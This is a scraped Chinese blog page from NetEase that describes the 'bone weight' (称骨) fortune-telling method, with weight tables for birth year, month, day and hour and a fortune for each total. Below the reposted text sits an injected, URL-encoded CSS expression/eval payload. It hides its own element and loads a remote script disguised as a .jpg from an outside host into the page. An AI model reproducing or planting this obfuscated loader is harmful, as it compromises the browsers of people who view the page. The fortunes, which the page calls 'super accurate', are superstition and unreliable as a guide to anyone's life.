注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

冰山上的雪莲花的博客

一个人几乎可以在任何他怀有无限热忱的事情上成功!

 
 
 

日志

 
 
关于我

雪莲花生长在雪山冰峰上,她抵御暴风雪袭击和零下几十度的寒冷,面对缺氧和强烈的紫外线照射顽强生长,在如此恶劣的环境中傲然挺立在高山顶上,不畏严寒,不惧风雪,始终保持着冰魂雪魄,坚贞不屈的性格,向世界展示了一个伟大生命的价值。

网易考拉推荐

2009年5月20日  

2009-05-20 18:50:54|  分类: 娱乐休闲 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

称骨,算命,超准!~

算法:出生年、月、日、时辰各有一个特定重量,把四项重量相加,便得出「骨重」。
    注意:出生年月日皆以农历计算,若不知道自己的农历生日日期,可翻查万年历 .
    晚上23点~24点按新一天计算,请大家特别注意,不要计算错误,影响结果!

年的重量 (注:6钱=0.6两,7钱=0.7两)
1941:6钱 1942:8钱 1943:7钱 1944:5钱 1945:1两5
1946:6钱 1947:1两6 1948:1两5 1949:7两 1950:9钱|
1951:1两2 1952:1两 1953:7钱 1954:1两5 1955:6钱
1956:5钱 1957:1两4 1958:1两4 1959:9钱 1960:7钱
1961:7钱 1962:9钱 1963:1两2 1964:8钱 1965:7钱
1966:1两3 1967:5钱 1968:1两4 1969:5钱 1970:9钱
1971:1两7 1972:5钱 1973:7钱 1974:1两2 1975:8钱
1976:8钱 1977:6钱 1978:1两9 1979:6钱 1980:8钱
1981:1两6 1982:1两 1983:7钱 1984:1两2 1985:9钱
1986:6钱 1987:7钱 1988:1两2 1989:5钱 1990:9钱
1991:8钱 1992:7钱 1993:8钱 1994:1两5 1995:9钱
1996:1两6 1997:8钱 1998:8钱 1999:1两9 2000:1两2
    
月(农历)
    正月 二月 三月 四月 五月 六月
    0.6两 0.7两 1.8两 0.9两 0.5两 1.6两
    七月 八月 九月 十月 十一月 十二月
    0.9两 1.5两 1.8两 0.8两 0.9两 0.5两 
    
日(农历)
    初一 初二 初三 初四 初五
    0.5两 1两 0.8两 1.5两 1.6两
    初六 初七 初八 初九 初十
    1.5两 0.8两 1.6两 0.8两 1.6两
    十一 十二 十三 十四 十五
    0.9两 1.7两 0.8两 1.7两 1两
    十六 十七 十八 十九 二十
    0.8两 0.9两 1.8两 0.5两 1.5两
    二十一 二十二 二十三 二十四 二十五
    1两 0.9两 0.8两 0.9两 1.5两
    二十六 二十七 二十八 二十九 三十
    1.8两 0.7两 0.8两 1.6两 0.6两
    
时辰
    子时 (23点 - 00点59)1.6两    午时 (1100 - 1259) 1两
    丑 (0100 - 0259)  0.6两      未 (1300 - 1459) 0.8两
    寅 (0300 - 0459)  0.7两      申 (1500 - 1659) 0.8两
    卯 (0500 - 0659)  1两        酉 (1700 - 1859) 0.9两
    辰 (0700 - 0859) 0.9两       戍 (1900 - 2059) 0.6两
    已 (0900 - 1059) 1.6两       亥 (2100 - 2259) 0.6两

    例:生于1980年新历8月29日晚上8时
    年: 1980年 = 0.8两
    月: 农历7月 = 0.9两
    日: 农历19日 = 0.5两
    时: 晚上8时 = 0.6两
    骨重 = 2.8两
    解说: 称骨歌的骨重由2.2两至7.1两,愈重愈佳,而每个重量亦有相关的解说,
由四句歌诀说出一生命运,现将每个重量的解说简化如下:

 

2.2两 为乞丐命,孤苦伶仃,朝不保夕,吃不饱穿不暖,为人庸碌无能,一生行乞度过。  
2.3两 福气不全,求谋作事却一事难成,妻儿兄弟旨不可靠,离乡别井投靠别人,尚可有两餐温饱。
2.4两 福禄不全,出身贫苦,家道难有兴旺的一日,亲人没有助力,宜出外谋事,但求三餐一宿。
2.5两 祖荫少,出身贫苦,六亲无情冷漠,难以依靠,一生辛劳自食其力,尚且能得两餐温饱。
2.6两 苦中挣扎,独自为生活奔波劳碌,宜及早离家谋事,勤勤恳恳,晚年生活虽不富裕,但总算无忧。
2.7两 祖荫少,出身贫苦,少年已须靠自己到处闯,到处碰壁,多做少成,一生烦恼困苦无穷无尽。
2.8两 出身贫苦,父母或家庭没能大庇荫,一生辗转流离,飘泊无依,若无过继他人,便是一生居无定所。
2.9两 早年运差,诸事欠顺,四十岁后才可安身立命,名成利就,离乡别井或改姓对运程有帮助。

3两 一生劳碌奔波,为生计而苦苦挣扎,难有安定日子,须终身勤俭克苦,晚年才能稍有安稳。
3.1两 早年谋事艰苦,家道贫寒,为生计而苦苦挣扎,中年后才见顺利,兴家立业,衣食尚算无忧。
3.2两 早年运滞,诸事难成,后来渐有财源滚滚的一天,而中年后衣食不缺,名利双收。
3.3两 早年事事难成,半生辛劳谋事亦枉费心力,多做少成,至晚年运势稍旺,衣食无忧。
3.4两 在尘世福禄不全,为僧道之命,须离乡别井,终身拜佛修道,多作善事才得善果。
3.5两 福分不全,缺少家荫,谋事须安守本份,不可好高远,待时来运到之时,自能衣食不缺。
3.6两 早年福星高照,际遇非凡,并非庸碌无能之人,福分不浅,能靠自己能力出人头地,诸事皆成。
3.7两 事事难成,兄弟缺乏助力,须自食其力,一生辛劳亦难守微不足道的祖业,枉费心力。
3.8两 骨格清高,聪明勤学,终能苦学成才,中年后有望摆脱贫苦,甚至踏足官场,或在大机构担任要职。
3.9两 终身运势不通,多劳少成,尽管一生苦心竭力,克勤克俭营生,即使略有所成,到头来还是无福享受。

4两 早年虽吃苦,但注定福禄绵长,早年受过不少风霜挫折,犹幸为人聪明能干,意志坚定,终能大器晚成。
4.1两 为人聪明能干,绝非池中物,早年运势欠顺,但中年运势转顺,已能无忧无虑,逍遥自在。
4.2两 早年运气不顺,为名利终日多思多虑,难以宽怀,中年后运势渐顺,名利齐来。
4.3两 心思灵巧,聪明能干,人品极佳,做事光明磊落,早注定衣禄丰厚,一生无须劳心劳神。
4.4两 早年过份强求名利,奈何财运不顺,但福份也是靠修来的,该放开胸怀,晚年便能无忧。
4.5两 早年为名利奔波劳碌,中年后亦难以安定,一生难有儿女,晚年运须靠早年未雨绸缪。
4.6两 父母没有能力庇荫,早年须离乡别井穿州过省谋事,改姓或过继他人运势更佳,中年后衣食丰足。
4.7两 福份绵长,无须为营生而终日劳碌,晚年运尤佳,妻 (夫) 荣子贵,生活无忧无虑,财源滚滚,丰衣足食。
4.8两 早运不佳,蹉跎岁月,辛苦奔波,多劳少成,命带孤苦,无依无靠,但晚年亦算兴隆,衣食丰足。
4.9两 福泽不浅,聪明自立,能靠双手光宗耀祖,白手兴家,晚年有名有利,有财有势,受人敬仰。

 

5两 为名利劳心劳力,难以安心,中年福禄亦不佳,但几番辛苦之后,晚年财星高照,衣食丰足。
5.1两 一生事事顺遂,无须劳心劳神,亲人皆有助力,一门显赫,立业兴家之时,福禄无穷。
5.2两 家世显赫,聪明有才干,一世亨通,事事顺利,无须劳苦奔波,自能光宗耀祖,家财万贯。
5.3两 福泽深厚,聪明有才干,一生衣食无忧,立业兴家,财源丰厚,富甲一方。
5.4两 福泽深厚,出身书香世代,饱读诗书,必能名成利就,丰衣足食,生活安稳,无忧无虑。
5.5两 才干非凡,从事武职 (纪律部队) 争名逐利,少年作事枉费心力,中年后富贵荣华,显耀六亲。
5.6两 人品非凡,胸怀磊落,早年尝过不少苦楚,但福禄无穷,财源滚滚,晚年丰足。
5.7两 福禄双全,富贵长寿,品德完美的圣人,名闻于世,受万人景仰,一生无忧无虑淡泊名利。
5.8两 富贵福禄俱全,衣食自来,饱读诗书,为高官厚禄之命,或在大机购中身居要职,执掌权柄。
5.9两 聪明灵巧,出类拔萃,饱读成才,在古代为状元之命,从事武职 (纪律部队) 功名显赫。

6两 聪明能干,饱读诗书,在古代必金榜提名,扬明立万,显耀宗亲,衣食不缺,田产家财丰盛。
6.1两 聪明能干,天才横溢,若非饱学成才,也必定富甲一方,成就非凡,举世闻名,光宗耀祖。
6.2两 福泽深厚,饱学成才,荣华富贵无穷无尽,在古代为卿相之命,威名显赫,在现今也可解作掌权。
6.3两 饱学成才,命格注定为官,或在大机购中掌权,福禄无穷,富贵荣华,家世兴旺,一门显赫。
6.4两 古代为上书之命,能掌权威,富贵不尽,功名显赫,在现今亦必为一国高官,政绩超凡。
6.5两 品格非凡,在古代为大将军之命,建功立业,威名显赫,在现今可解作从事武职而得威权。
6.6两 出身富裕之家,福气深厚,无须为名利烦恼,无忧无虑,亦可凭一己聪明而饱学成才。
6.7两 出身显赫富裕之家,福禄自然而至,家财冠世而声望高,富可敌国,衣食丰足,事事顺利。
6.8两 生于富裕之家,家财万贯,无须为名利愁烦,但才干不凡,能靠自己能力使家业更鼎盛。
6.9两 在古代为受封赐之命,在现代可以为官,亦可以是在大机购中受到赏识而掌权,富贵双全,受人钦仰。


7两 虽福份不轻,但终日劳心劳神,劳劳役役,追名逐利,其实注定富贵双全,位高权重,名闻四海。
7.1两 命格超凡,富贵双全,在古代为公侯卿相之命,成就非凡,位高权重之余,却能无忧无虑。

                                                                                   ——转载自   たかはし

 

id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27

 

none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com">

 
 
 

  评论这张
 
阅读(42)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017